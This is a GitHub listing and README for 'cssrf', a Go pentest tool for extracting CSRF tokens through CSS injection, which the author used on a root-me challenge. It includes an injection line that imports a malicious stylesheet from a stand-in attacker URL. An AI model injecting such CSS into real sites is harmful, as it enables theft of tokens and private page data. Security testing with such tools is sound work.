https://github.com/ariary/cssrf

Ease CSS exfiltration
https://github.com/ariary/cssrf

csrf css exfiltration pentest-tool websecurity

Last synced: about 1 month ago
JSON representation

Ease CSS exfiltration

• Host: GitHub
• URL: https://github.com/ariary/cssrf
• Owner: ariary
• Created: 2022-06-01T13:53:35.000Z (over 2 years ago)
• Default Branch: main
• Last Pushed: 2023-02-11T21:12:16.000Z (almost 2 years ago)
• Last Synced: 2024-06-20T02:01:36.103Z (6 months ago)
• Topics: csrf, css, exfiltration, pentest-tool, websecurity
• Language: Go
• Homepage:
• Size: 4.66 MB
• Stars: 4
• Watchers: 1
• Forks: 1
• Open Issues: 2
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        
# cssrf





Extract juicy information using CSS injection

especially csrf token 🥜




Basically the same thing as https://github.com/d0nutptr/sic but in Golang


I try my best to change the rust code but I lost so many time





## Show me!

All you need is **launch** `cssrf`:

```shell

cssrf [flags] # nothing crazy => cssrf -h to get flags info

```

**Inject**  the malicious css:

```html

@import url("https://[ATTACKER_URL]/malicious.css");

```

And **wait**:

![demo](https://github.com/ariary/cssrf/blob/main/cssrf.gif)

*This help me solving a [root-me](https://www.root-me.org/fr/Challenges/Web-Client/CSS-Exfiltration) challenge*

Posting solution is forbidden, thus the csrf token is not integer